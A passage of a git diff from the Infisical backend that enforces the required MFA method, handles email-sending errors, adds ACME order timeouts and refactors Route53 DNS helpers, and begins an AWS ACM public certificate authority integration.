"@app/lib/validator"; import { getUserAgentType } from "@app/server/plugins/audit-log"; @@ -38,7 +40,7 @@ import { TNotificationServiceFactory } from "../notification/notification-servic import { NotificationType } from "../notification/notification-types"; import { TOrgDALFactory } from "../org/org-dal"; import { getDefaultOrgMembershipRole } from "../org/org-role-fns"; -import { SmtpTemplates, TSmtpService } from "../smtp/smtp-service"; +import { SmtpTemplates, throwIfSmtpError, TSmtpService } from "../smtp/smtp-service"; import { LoginMethod } from "../super-admin/super-admin-types"; import { TTotpServiceFactory } from "../totp/totp-service"; import { TUserDALFactory } from "../user/user-dal"; @@ -115,17 +117,19 @@ export const authLoginServiceFactory = ({ ]); if (user.email) { - await smtpService.sendMail({ - template: SmtpTemplates.NewDeviceJoin, - subjectLine: "Successful login from new device", - recipients: [user.email], - substitutions: { - email: user.email, - timestamp: new Date().toString(), - ip, - userAgent - } - }); + await smtpService + .sendMail({ + template: SmtpTemplates.NewDeviceJoin, + subjectLine: "Successful login from new device", + recipients: [user.email], + substitutions: { + email: user.email, + timestamp: new Date().toString(), + ip, + userAgent + } + }) + .catch((err) => logger.error(err, "Failed to send new device login email")); } } }; @@ -140,14 +144,16 @@ export const authLoginServiceFactory = ({ userId }); - await smtpService.sendMail({ - template: SmtpTemplates.EmailMfa, - subjectLine: "Infisical MFA code", - recipients: [email], - substitutions: { - code - } - }); + await smtpService + .sendMail({ + template: SmtpTemplates.EmailMfa, + subjectLine: "Infisical MFA code", + recipients: [email], + substitutions: { + code + } + }) + .catch((err) => throwIfSmtpError(err, "Failed to send MFA code email")); }; /* @@ -194,7 +200,8 @@ export const authLoginServiceFactory = ({ authTokenType: AuthTokenType.MFA_TOKEN, userId, organizationId, - email + email, + requiredMfaMethod }, appCfg.AUTH_SECRET, { expiresIn: appCfg.JWT_MFA_LIFETIME } @@ -250,7 +257,9 @@ export const authLoginServiceFactory = ({ let refreshTokenExpiresIn: string | number = cfg.JWT_REFRESH_LIFETIME; if (organizationId) { - const org = await orgDAL.findById(organizationId); + const org = await requestMemoize(requestMemoKeys.orgFindById(organizationId), () => + orgDAL.findById(organizationId) + ); if (org) { await membershipUserDAL.update( { actorUserId: userId, scopeOrgId: org.id, scope: AccessScope.Organization }, @@ -596,7 +605,13 @@ export const authLoginServiceFactory = ({ * Multi factor authentication re-send code, Get user id from token * saved in frontend */ - const resendMfaToken = async (userId: string) => { + const resendMfaToken = async (userId: string, requiredMfaMethod: MfaMethod) => { + if (requiredMfaMethod !== MfaMethod.EMAIL) { + throw new BadRequestError({ + message: "Email MFA code cannot be sent when a different MFA method is required" + }); + } + const user = await userDAL.findById(userId); if (!user || !user.email) return; enforceUserLockStatus(Boolean(user.isLocked), user.temporaryLockDateEnd); @@ -663,6 +678,7 @@ export const authLoginServiceFactory = ({ userId, mfaToken, mfaMethod, + requiredMfaMethod, mfaJwtToken, ip, userAgent, @@ -673,6 +689,12 @@ export const authLoginServiceFactory = ({ const user = await userDAL.findById(userId); try { + if (mfaMethod !== requiredMfaMethod) { + throw new BadRequestError({ + message: `Invalid MFA method. ${requiredMfaMethod} verification is required.` + }); + } + enforceUserLockStatus(Boolean(user.isLocked), user.temporaryLockDateEnd); if (mfaMethod === MfaMethod.EMAIL) { await tokenService.validateTokenForUser({ @@ -740,7 +762,11 @@ export const authLoginServiceFactory = ({ }); // Mark that an unlock email was sent, expires after 5 minutes - await keyStore.setItemWithExpiry(KeyStorePrefixes.UserMfaUnlockEmailSent(userId), 300, "1"); + await keyStore.setItemWithExpiry( + KeyStorePrefixes.UserMfaUnlockEmailSent(userId), + KeyStoreTtls.UserMfaUnlockEmailSentInSeconds, + "1" + ); } } catch (lockErr) { if (lock) { @@ -909,7 +935,9 @@ export const authLoginServiceFactory = ({ ); if (authMethod === AuthMethod.GITHUB && serverCfg.defaultAuthOrgId && !appCfg.isCloud) { - const defaultOrg = await orgDAL.findOrgById(serverCfg.defaultAuthOrgId); + const defaultOrg = await requestMemoize(requestMemoKeys.orgFindOrgById(serverCfg.defaultAuthOrgId), () => + orgDAL.findOrgById(serverCfg.defaultAuthOrgId as string) + ); if (!defaultOrg) { throw new BadRequestError({ message: `Failed to find default organization with ID ${serverCfg.defaultAuthOrgId}` @@ -1070,7 +1098,7 @@ export const authLoginServiceFactory = ({ await smtpService.sendMail({ template: SmtpTemplates.EmailVerification, - subjectLine: "Infisical confirmation code", + subjectLine: `Infisical confirmation code: ${verificationCode}`, recipients: [user.email], substitutions: { code: verificationCode @@ -1140,7 +1168,9 @@ export const authLoginServiceFactory = ({ }); } - const selectedOrg = await orgDAL.findById(organizationId); + const selectedOrg = await requestMemoize(requestMemoKeys.orgFindById(organizationId), () => + orgDAL.findById(organizationId) + ); if (!selectedOrg) { throw new NotFoundError({ message: `Organization with ID '${organizationId}' not found` }); } @@ -1156,7 +1186,9 @@ export const authLoginServiceFactory = ({ }); } - rootOrg = await orgDAL.findById(selectedOrg.rootOrgId); + rootOrg = await requestMemoize(requestMemoKeys.orgFindById(selectedOrg.rootOrgId), () => + orgDAL.findById(selectedOrg.rootOrgId as string) + ); if (!rootOrg) { throw new BadRequestError({ message: "Invalid sub-organization" @@ -1314,19 +1346,21 @@ export const authLoginServiceFactory = ({ })) ); - await smtpService.sendMail({ - recipients: adminEmails, - subjectLine: "Security Alert: SSO Bypass", - substitutions: { - email: user.email, - timestamp: new Date().toISOString(), - ip: ipAddress, - userAgent, - siteUrl: removeTrailingSlash(cfg.SITE_URL || "https://app.infisical.com"), - orgId: organizationId - }, - template: SmtpTemplates.OrgAdminBreakglassAccess - }); + await smtpService + .sendMail({ + recipients: adminEmails, + subjectLine: "Security Alert: SSO Bypass", + substitutions: { + email: user.email, + timestamp: new Date().toISOString(), + ip: ipAddress, + userAgent, + siteUrl: removeTrailingSlash(cfg.SITE_URL || "https://app.infisical.com"), + orgId: organizationId + }, + template: SmtpTemplates.OrgAdminBreakglassAccess + }) + .catch((err) => logger.error(err, "Failed to send SSO bypass alert email")); } } diff --git a/backend/src/services/auth/auth-login-type.ts b/backend/src/services/auth/auth-login-type.ts index 29b58c6a321..18a58a1c8c1 100644 --- a/backend/src/services/auth/auth-login-type.ts +++ b/backend/src/services/auth/auth-login-type.ts @@ -20,6 +20,7 @@ export type TVerifyMfaTokenDTO = { userId: string; mfaToken: string; mfaMethod: MfaMethod; + requiredMfaMethod: MfaMethod; mfaJwtToken: string; ip: string; userAgent: string; diff --git a/backend/src/services/auth/auth-signup-service.ts b/backend/src/services/auth/auth-signup-service.ts index 2025ed57590..1264c7ea624 100644 --- a/backend/src/services/auth/auth-signup-service.ts +++ b/backend/src/services/auth/auth-signup-service.ts @@ -2,13 +2,14 @@ import { AccessScope, OrgMembershipStatus } from "@app/db/schemas"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; import { BadRequestError, UnauthorizedError } from "@app/lib/errors"; +import { logger } from "@app/lib/logger"; import { isDisposableEmail, sanitizeEmail, validateEmail } from "@app/lib/validator"; import { TAuthTokenServiceFactory } from "../auth-token/auth-token-service"; import { TokenType } from "../auth-token/auth-token-types"; import { TOrgDALFactory } from "../org/org-dal"; import { TOrgServiceFactory } from "../org/org-service"; -import { SmtpTemplates, TSmtpService } from "../smtp/smtp-service"; +import { SmtpTemplates, throwIfSmtpError, TSmtpService } from "../smtp/smtp-service"; import { TUserDALFactory } from "../user/user-dal"; import { TUserAliasDALFactory } from "../user-alias/user-alias-dal"; import { TAuthDALFactory } from "./auth-dal"; @@ -56,16 +57,20 @@ export const authSignupServiceFactory = ({ // Send informational email for existing accounts instead of throwing error // This prevents user enumeration vulnerability const appCfg = getConfig(); - await smtpService.sendMail({ - template: SmtpTemplates.SignupExistingAccount, - subjectLine: "Sign-up Request for Your Infisical Account", - recipients: [sanitizedEmail], - substitutions: { - email: sanitizedEmail, - loginUrl: `${appCfg.SITE_URL}/login`, - resetPasswordUrl: `${appCfg.SITE_URL}/account-recovery` - } - }); + await smtpService + .sendMail({ + template: SmtpTemplates.SignupExistingAccount, + subjectLine: "Sign-up Request for Your Infisical Account", + recipients: [sanitizedEmail], + substitutions: { + email: sanitizedEmail, + loginUrl: `${appCfg.SITE_URL}/login`, + resetPasswordUrl: `${appCfg.SITE_URL}/account-recovery` + } + }) + .catch((err) => + logger.error(err, "Failed to send existing account email β€” swallowing to prevent user enumeration") + ); return; } @@ -84,14 +89,16 @@ export const authSignupServiceFactory = ({ userId: user.id }); - await smtpService.sendMail({ - template: SmtpTemplates.SignupEmailVerification, - subjectLine: "Infisical confirmation code", - recipients: [sanitizedEmail], - substitutions: { - code: token - } - }); + await smtpService + .sendMail({ + template: SmtpTemplates.SignupEmailVerification, + subjectLine: `Infisical confirmation code: ${token}`, + recipients: [sanitizedEmail], + substitutions: { + code: token + } + }) + .catch((err) => throwIfSmtpError(err, "Failed to send signup verification email")); }; const verifyEmailSignup = async (email: string, code: string) => { @@ -164,9 +171,10 @@ export const authSignupServiceFactory = ({ // whether the request is valid. This prevents timing-based user/alias enumeration. let authMethod: AuthMethod; let organizationId: string | undefined; + let isInvitedUser = false; if (dto.type === CompleteAccountType.Email) { // Determine rejection before hashing, but don't throw yet - const shouldReject = !user || user.isAccepted; + const shouldReject = !user || user.isAccepted || Boolean(decodedToken?.aliasId); // Always hash the password so bcrypt cost is incurred regardless of validity const hashedPassword = await crypto.hashing().createHash(dto.password, appCfg.SALT_ROUNDS); @@ -190,7 +198,7 @@ export const authSignupServiceFactory = ({ }, { tx } ); - const isInvitedUser = existingMemberships.length > 0; + isInvitedUser = existingMemberships.length > 0; if (!isInvitedUser && dto.organizationName) { const org = await orgService.createOrganization( { @@ -289,7 +297,8 @@ export const authSignupServiceFactory = ({ accessToken: tokens.access, refreshToken: tokens.refresh, authMethod, - organizationId + organizationId, + isInvitedUser }; }; diff --git a/backend/src/services/auth/auth-type.ts b/backend/src/services/auth/auth-type.ts index 3c1e2f83ed6..1374bcf0859 100644 --- a/backend/src/services/auth/auth-type.ts +++ b/backend/src/services/auth/auth-type.ts @@ -21,7 +21,9 @@ export enum AuthTokenType { SERVICE_ACCESS_TOKEN = "serviceAccessToken", SERVICE_REFRESH_TOKEN = "serviceRefreshToken", IDENTITY_ACCESS_TOKEN = "identityAccessToken", - SCIM_TOKEN = "scimToken" + SCIM_TOKEN = "scimToken", + GATEWAY_ACCESS_TOKEN = "gatewayAccessToken", + ACCOUNT_RECOVERY_TOKEN = "accountRecoveryToken" } // Result state from processProviderCallback β€” determines what the route handler should do @@ -38,7 +40,8 @@ export enum AuthMode { API_KEY = "apiKey", IDENTITY_ACCESS_TOKEN = "identityAccessToken", SCIM_TOKEN = "scimToken", - MCP_JWT = "mcpJwt" + MCP_JWT = "mcpJwt", + GATEWAY_ACCESS_TOKEN = "gatewayAccessToken" } export enum ActorType { // would extend to AWS, Azure, ... @@ -52,9 +55,17 @@ export enum ActorType { // would extend to AWS, Azure, ... ACME_ACCOUNT = "acmeAccount", EST_ACCOUNT = "estAccount", SCEP_ACCOUNT = "scepAccount", - UNKNOWN_USER = "unknownUser" + UNKNOWN_USER = "unknownUser", + GATEWAY = "gateway" } +export type TGatewayAccessTokenJwtPayload = { + authTokenType: AuthTokenType.GATEWAY_ACCESS_TOKEN; + gatewayId: string; + orgId: string; + tokenVersion: number; +}; + // This will be null unless the token-type is JWT export type ActorAuthMethod = AuthMethod | null; @@ -78,6 +89,7 @@ export type AuthModeMfaJwtTokenPayload = { authMethod: AuthMethod; userId: string; organizationId?: string; + requiredMfaMethod: MfaMethod; }; export type AuthModeRefreshJwtTokenPayload = { @@ -107,6 +119,11 @@ export type AuthModeSignUpTokenPayload = { lastName?: string; }; +export type AuthModeAccountRecoveryTokenPayload = { + authTokenType: AuthTokenType.ACCOUNT_RECOVERY_TOKEN; + userId: string; +}; + export enum MfaMethod { EMAIL = "email", TOTP = "totp", diff --git a/backend/src/services/certificate-authority/acme/acme-certificate-authority-errors.ts b/backend/src/services/certificate-authority/acme/acme-certificate-authority-errors.ts new file mode 100644 index 00000000000..1853b9f1344 --- /dev/null +++ b/backend/src/services/certificate-authority/acme/acme-certificate-authority-errors.ts @@ -0,0 +1,79 @@ +/* eslint-disable max-classes-per-file */ +import RE2 from "re2"; + +import { logger } from "@app/lib/logger"; + +export const ACME_ORDER_TIMEOUT_MS = 5 * 60 * 1000; + +export class AcmeOrderTimeoutError extends Error { + constructor(message: string) { + super(message); + this.name = "AcmeOrderTimeoutError"; + } +} + +export class AcmeRateLimitError extends Error { + constructor(message: string) { + super(message); + this.name = "AcmeRateLimitError"; + } +} + +const ACME_ERROR_URN_PREFIX = "urn:ietf:params:acme:error:"; + +const RATE_LIMIT_URN = `${ACME_ERROR_URN_PREFIX}rateLimited`; + +const RATE_LIMITED_WORD_RE = new RE2("\\brateLimited\\b", "i"); + +export const isAcmeRateLimitError = (error: unknown): boolean => { + if (!(error instanceof Error)) return false; + return error.message.includes(RATE_LIMIT_URN) || RATE_LIMITED_WORD_RE.test(error.message); +}; + +const formatTimeoutDuration = (timeoutMs: number): string => { + const totalSeconds = Math.round(timeoutMs / 1000); + if (totalSeconds % 60 === 0) { + const minutes = totalSeconds / 60; + return `${minutes} minute${minutes === 1 ? "" : "s"}`; + } + return `${totalSeconds} seconds`; +}; + +export const runWithAcmeOrderTimeout = async ( + operationFactory: (signal: AbortSignal) => Promise, + timeoutMs: number +): Promise => { + const controller = new AbortController(); + let timeoutHandle: NodeJS.Timeout | undefined; + const duration = formatTimeoutDuration(timeoutMs); + + const timeoutPromise = new Promise((_, reject) => { + timeoutHandle = setTimeout(() => { + controller.abort(); + reject( + new AcmeOrderTimeoutError( + `ACME order did not complete within ${duration}. Possible causes: the CA is rate-limiting requests, the order is blocked at validation, or the CA is slow to respond.` + ) + ); + }, timeoutMs); + }); + + const operationPromise = operationFactory(controller.signal); + operationPromise.catch((err: unknown) => { + if (controller.signal.aborted) { + logger.debug({ err }, "ACME order operation rejected after timeout"); + } + }); + + try { + return await Promise.race([operationPromise, timeoutPromise]); + } finally { + if (timeoutHandle) clearTimeout(timeoutHandle); + } +}; + +export const throwIfAcmeOrderAborted = (signal: AbortSignal | undefined): void => { + if (signal?.aborted) { + throw new Error("ACME order aborted after timeout"); + } +}; diff --git a/backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts b/backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts index 05047274eef..5a79bc0c746 100644 --- a/backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts +++ b/backend/src/services/certificate-authority/acme/acme-certificate-authority-fns.ts @@ -43,8 +43,10 @@ import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; import { CaStatus, CaType } from "../certificate-authority-enums"; import { keyAlgorithmToAlgCfg } from "../certificate-authority-fns"; +import { route53DeleteRecord, route53UpsertRecord } from "../dns-providers/route53"; import { TExternalCertificateAuthorityDALFactory } from "../external-certificate-authority-dal"; import { AcmeDnsProvider } from "./acme-certificate-authority-enums"; +import { throwIfAcmeOrderAborted } from "./acme-certificate-authority-errors"; import { AcmeCertificateAuthorityCredentialsSchema } from "./acme-certificate-authority-schemas"; import { TAcmeCertificateAuthority, @@ -54,7 +56,6 @@ import { import { azureDnsDeleteTxtRecord, azureDnsInsertTxtRecord } from "./dns-providers/azure-dns"; import { cloudflareDeleteTxtRecord, cloudflareInsertTxtRecord } from "./dns-providers/cloudflare"; import { dnsMadeEasyDeleteTxtRecord, dnsMadeEasyInsertTxtRecord } from "./dns-providers/dns-made-easy"; -import { route53DeleteTxtRecord, route53InsertTxtRecord } from "./dns-providers/route54"; const validateDnsResolver = (resolver: string): void => { const appCfg = getConfig(); @@ -295,7 +296,8 @@ export const orderCertificate = async ( signatureAlgorithm, keyAlgorithm, isRenewal, - originalCertificateId + originalCertificateId, + abortSignal }: { caId: string; profileId?: string; @@ -311,6 +313,7 @@ export const orderCertificate = async ( keyAlgorithm?: string; isRenewal?: boolean; originalCertificateId?: string; + abortSignal?: AbortSignal; }, deps: TOrderCertificateDeps, tx?: Knex @@ -422,12 +425,13 @@ export const orderCertificate = async ( switch (acmeCa.configuration.dnsProviderConfig.provider) { case AcmeDnsProvider.Route53: { - await route53InsertTxtRecord( - connection as TAwsConnection, - acmeCa.configuration.dnsProviderConfig.hostedZoneId, - recordName, - recordValue - ); + await route53UpsertRecord(connection as TAwsConnection, acmeCa.configuration.dnsProviderConfig.hostedZoneId, { + name: recordName, + type: "TXT", + value: recordValue, + ttl: 30, + comment: "Set ACME challenge TXT record" + }); break; } case AcmeDnsProvider.Cloudflare: { @@ -478,12 +482,13 @@ export const orderCertificate = async ( switch (acmeCa.configuration.dnsProviderConfig.provider) { case AcmeDnsProvider.Route53: { - await route53DeleteTxtRecord( - connection as TAwsConnection, - acmeCa.configuration.dnsProviderConfig.hostedZoneId, - recordName, - recordValue - ); + await route53DeleteRecord(connection as TAwsConnection, acmeCa.configuration.dnsProviderConfig.hostedZoneId, { + name: recordName, + type: "TXT", + value: recordValue, + ttl: 30, + comment: "Delete ACME challenge TXT record" + }); break; } case AcmeDnsProvider.Cloudflare: { @@ -520,6 +525,8 @@ export const orderCertificate = async ( } }); + throwIfAcmeOrderAborted(abortSignal); + const [leafCert, parentCert] = acme.crypto.splitPemChain(pem); const certObj = new x509.X509Certificate(leafCert); @@ -924,7 +931,8 @@ export const AcmeCertificateAuthorityFns = ({ signatureAlgorithm, keyAlgorithm, isRenewal, - originalCertificateId + originalCertificateId, + abortSignal }: { caId: string; profileId?: string; @@ -939,6 +947,7 @@ export const AcmeCertificateAuthorityFns = ({ keyAlgorithm?: string; isRenewal?: boolean; originalCertificateId?: string; + abortSignal?: AbortSignal; }) => { return orderCertificate( { @@ -955,7 +964,8 @@ export const AcmeCertificateAuthorityFns = ({ signatureAlgorithm, keyAlgorithm, isRenewal, - originalCertificateId + originalCertificateId, + abortSignal }, { appConnectionDAL, diff --git a/backend/src/services/certificate-authority/acme/dns-providers/azure-dns.ts b/backend/src/services/certificate-authority/acme/dns-providers/azure-dns.ts index 6f8e80d154a..03fdcee5eda 100644 --- a/backend/src/services/certificate-authority/acme/dns-providers/azure-dns.ts +++ b/backend/src/services/certificate-authority/acme/dns-providers/azure-dns.ts @@ -1,4 +1,4 @@ -import axios from "axios"; +import { isAxiosError } from "axios"; import { request } from "@app/lib/config/request"; import { logger } from "@app/lib/logger"; @@ -41,7 +41,7 @@ export const azureDnsInsertTxtRecord = async ( } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access const errorMessage = (error.response?.data?.error?.message || error.message || "Unknown error") as string; throw new Error(typeof errorMessage === "string" ? errorMessage : String(errorMessage)); @@ -75,7 +75,7 @@ export const azureDnsDeleteTxtRecord = async ( } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { if (error.response?.status === 404) { logger.warn({ hostedZoneId, recordName, value }, "TXT record not found for deletion"); return; diff --git a/backend/src/services/certificate-authority/acme/dns-providers/cloudflare.ts b/backend/src/services/certificate-authority/acme/dns-providers/cloudflare.ts index 10de8c6c8a8..d9b6d088b51 100644 --- a/backend/src/services/certificate-authority/acme/dns-providers/cloudflare.ts +++ b/backend/src/services/certificate-authority/acme/dns-providers/cloudflare.ts @@ -1,5 +1,6 @@ /* eslint-disable no-await-in-loop */ -import axios from "axios"; + +import { isAxiosError } from "axios"; import { request } from "@app/lib/config/request"; import { TCloudflareConnectionConfig } from "@app/services/app-connection/cloudflare/cloudflare-connection-types"; @@ -34,7 +35,7 @@ export const cloudflareInsertTxtRecord = async ( } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { const firstErrorMessage = ( error.response?.data as { errors?: { message: string }[]; @@ -125,7 +126,7 @@ export const cloudflareDeleteTxtRecord = async ( } if (lastError) { - if (axios.isAxiosError(lastError)) { + if (isAxiosError(lastError)) { const firstErrorMessage = ( lastError.response?.data as { errors?: { message: string }[]; diff --git a/backend/src/services/certificate-authority/acme/dns-providers/dns-made-easy.ts b/backend/src/services/certificate-authority/acme/dns-providers/dns-made-easy.ts index cbfb26a2ec2..d54c67f2938 100644 --- a/backend/src/services/certificate-authority/acme/dns-providers/dns-made-easy.ts +++ b/backend/src/services/certificate-authority/acme/dns-providers/dns-made-easy.ts @@ -1,4 +1,4 @@ -import axios from "axios"; +import { isAxiosError } from "axios"; import { request } from "@app/lib/config/request"; import { logger } from "@app/lib/logger"; @@ -38,7 +38,7 @@ export const dnsMadeEasyInsertTxtRecord = async ( } ); } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { const errorMessage = (error.response?.data as { error?: string[] | string })?.error?.[0] || (error.response?.data as { error?: string[] | string })?.error || @@ -93,7 +93,7 @@ export const dnsMadeEasyDeleteTxtRecord = async ( logger.warn({ hostedZoneId, domain, value }, "Record to delete not found"); } } catch (error) { - if (axios.isAxiosError(error)) { + if (isAxiosError(error)) { const errorMessage = (error.response?.data as { error?: string[] | string })?.error?.[0] || (error.response?.data as { error?: string[] | string })?.error || diff --git a/backend/src/services/certificate-authority/acme/dns-providers/route54.ts b/backend/src/services/certificate-authority/acme/dns-providers/route54.ts deleted file mode 100644 index e2878ad4835..00000000000 --- a/backend/src/services/certificate-authority/acme/dns-providers/route54.ts +++ /dev/null @@ -1,75 +0,0 @@ -import { ChangeResourceRecordSetsCommand, Route53Client } from "@aws-sdk/client-route-53"; - -import { CustomAWSHasher } from "@app/lib/aws/hashing"; -import { crypto } from "@app/lib/crypto/cryptography"; -import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; -import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; -import { TAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-types"; - -export const route53InsertTxtRecord = async ( - connection: TAwsConnectionConfig, - hostedZoneId: string, - domain: string, - value: string -) => { - const config = await getAwsConnectionConfig(connection, AWSRegion.US_WEST_1); // REGION is irrelevant because Route53 is global - const route53Client = new Route53Client({ - sha256: CustomAWSHasher, - useFipsEndpoint: crypto.isFipsModeEnabled(), - credentials: config.credentials, - region: config.region - }); - - const command = new ChangeResourceRecordSetsCommand({ - HostedZoneId: hostedZoneId, - ChangeBatch: { - Comment: "Set ACME challenge TXT record", - Changes: [ - { - Action: "UPSERT", - ResourceRecordSet: { - Name: domain, - Type: "TXT", - TTL: 30, - ResourceRecords: [{ Value: value }] - } - } - ] - } - }); - - await route53Client.send(command); -}; - -export const route53DeleteTxtRecord = async ( - connection: TAwsConnectionConfig, - hostedZoneId: string, - domain: string, - value: string -) => { - const config = await getAwsConnectionConfig(connection, AWSRegion.US_WEST_1); // REGION is irrelevant because Route53 is global - const route53Client = new Route53Client({ - credentials: config.credentials, - region: config.region - }); - - const command = new ChangeResourceRecordSetsCommand({ - HostedZoneId: hostedZoneId, - ChangeBatch: { - Comment: "Delete ACME challenge TXT record", - Changes: [ - { - Action: "DELETE", - ResourceRecordSet: { - Name: domain, - Type: "TXT", - TTL: 30, - ResourceRecords: [{ Value: value }] - } - } - ] - } - }); - - await route53Client.send(command); -}; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-client.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-client.ts new file mode 100644 index 00000000000..c4c624cfb47 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-client.ts @@ -0,0 +1,60 @@ +import { ACMClient } from "@aws-sdk/client-acm"; + +import { CustomAWSHasher } from "@app/lib/aws/hashing"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { NotFoundError } from "@app/lib/errors"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AWSRegion } from "@app/services/app-connection/app-connection-enums"; +import { decryptAppConnection } from "@app/services/app-connection/app-connection-fns"; +import { getAwsConnectionConfig } from "@app/services/app-connection/aws/aws-connection-fns"; +import { TAwsConnection } from "@app/services/app-connection/aws/aws-connection-types"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; + +export const createAcmClient = async ({ + appConnectionId, + region, + appConnectionDAL, + kmsService +}: { + appConnectionId: string; + region: AWSRegion; + appConnectionDAL: Pick; + kmsService: Pick< + TKmsServiceFactory, + "encryptWithKmsKey" | "generateKmsKey" | "createCipherPairWithDataKey" | "decryptWithKmsKey" + >; +}) => { + const appConnection = await appConnectionDAL.findById(appConnectionId); + if (!appConnection) { + throw new NotFoundError({ message: `App connection with ID '${appConnectionId}' not found` }); + } + + const decryptedConnection = (await decryptAppConnection(appConnection, kmsService)) as TAwsConnection; + const awsConfig = await getAwsConnectionConfig(decryptedConnection, region); + + return new ACMClient({ + sha256: CustomAWSHasher, + useFipsEndpoint: crypto.isFipsModeEnabled(), + credentials: awsConfig.credentials, + region: awsConfig.region + }); +}; + +export const resolveDnsAwsConnection = async ({ + dnsAppConnectionId, + appConnectionDAL, + kmsService +}: { + dnsAppConnectionId: string; + appConnectionDAL: Pick; + kmsService: Pick< + TKmsServiceFactory, + "encryptWithKmsKey" | "generateKmsKey" | "createCipherPairWithDataKey" | "decryptWithKmsKey" + >; +}) => { + const dnsAppConnection = await appConnectionDAL.findById(dnsAppConnectionId); + if (!dnsAppConnection) { + throw new NotFoundError({ message: `DNS app connection with ID '${dnsAppConnectionId}' not found` }); + } + return (await decryptAppConnection(dnsAppConnection, kmsService)) as TAwsConnection; +}; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-enums.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-enums.ts new file mode 100644 index 00000000000..c2a669d21e7 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-enums.ts @@ -0,0 +1,9 @@ +export enum AwsAcmValidationMethod { + DNS = "DNS" +} + +/** + * ACM public certificates have a fixed validity period (as of 2025). + * See: https://docs.aws.amazon.com/acm/latest/userguide/managed-renewal.html + */ +export const AWS_ACM_CERTIFICATE_VALIDITY_DAYS = 198; diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-errors.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-errors.ts new file mode 100644 index 00000000000..66bdf47f292 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-errors.ts @@ -0,0 +1,15 @@ +/* eslint-disable max-classes-per-file */ + +export class AcmPendingError extends Error { + constructor(message: string) { + super(message); + this.name = "AcmPendingError"; + } +} + +export class AcmTerminalError extends Error { + constructor(message: string) { + super(message); + this.name = "AcmTerminalError"; + } +} diff --git a/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns.ts b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns.ts new file mode 100644 index 00000000000..d4a44c45300 --- /dev/null +++ b/backend/src/services/certificate-authority/aws-acm-public-ca/aws-acm-public-ca-certificate-authority-fns.ts @@ -0,0 +1,865 @@ +/* eslint-disable no-await-in-loop */ +import { + ACMClient, + CertificateExport, + CertificateStatus, + DescribeCertificateCommand, + ExportCertificateCommand, + ListCertificatesCommand, + RenewCertificateCommand, + RequestCertificateCommand, + RevocationReason, + RevokeCertificateCommand, + ValidationMethod +} from "@aws-sdk/client-acm"; +import * as x509 from "@peculiar/x509"; +import RE2 from "re2"; + +import { TableName } from "@app/db/schemas"; +import { crypto } from "@app/lib/crypto/cryptography"; +import { BadRequestError, NotFoundError } from "@app/lib/errors"; +import { ProcessedPermissionRules } from "@app/lib/knex/permission-filter-utils"; +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; +import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; +import { AppConnection, AWSRegion } from "@app/services/app-connection/app-connection-enums"; +import { TAppConnectionServiceFactory } from "@app/services/app-connection/app-connection-service"; +import { TCertificateBodyDALFactory } from "@app/services/certificate/certificate-body-dal"; +import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; +import { extractCertificateFields } from "@app/services/certificate/certificate-fns"; +import { TCertificateSecretDALFactory } from "@app/services/certificate/certificate-secret-dal"; +import { + CertExtendedKeyUsage, + CertExtendedKeyUsageOIDToName, + CertKeyAlgorithm, + CertKeyUsage, + CertSignatureAlgorithm, + CertStatus, + CertSubjectAlternativeNameType, + CrlReason +} from "@app/services/certificate/certificate-types"; +import { ExternalMetadataSchema } from "@app/services/certificate-common/external-metadata-schemas"; +import { TCertificateProfileDALFactory } from "@app/services/certificate-profile/certificate-profile-dal"; +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { TProjectDALFactory } from "@app/services/project/project-dal"; +import { getProjectKmsCertificateKeyId } from "@app/services/project/project-fns"; + +import { TCertificateAuthorityDALFactory } from "../certificate-authority-dal"; +import { CaStatus, CaType } from "../certificate-authority-enums"; +import { route53GetHostedZone, route53UpsertRecord } from "../dns-providers/route53"; +import { TExternalCertificateAuthorityDALFactory } from "../external-certificate-authority-dal"; +import { createAcmClient, resolveDnsAwsConnection } from "./aws-acm-public-ca-certificate-authority-client"; +import { AwsAcmValidationMethod } from "./aws-acm-public-ca-certificate-authority-enums"; +import { AcmPendingError, AcmTerminalError } from "./aws-acm-public-ca-certificate-authority-errors"; +import { + TAwsAcmPublicCaCertificateAuthority, + TCreateAwsAcmPublicCaCertificateAuthorityDTO, + TUpdateAwsAcmPublicCaCertificateAuthorityDTO +} from 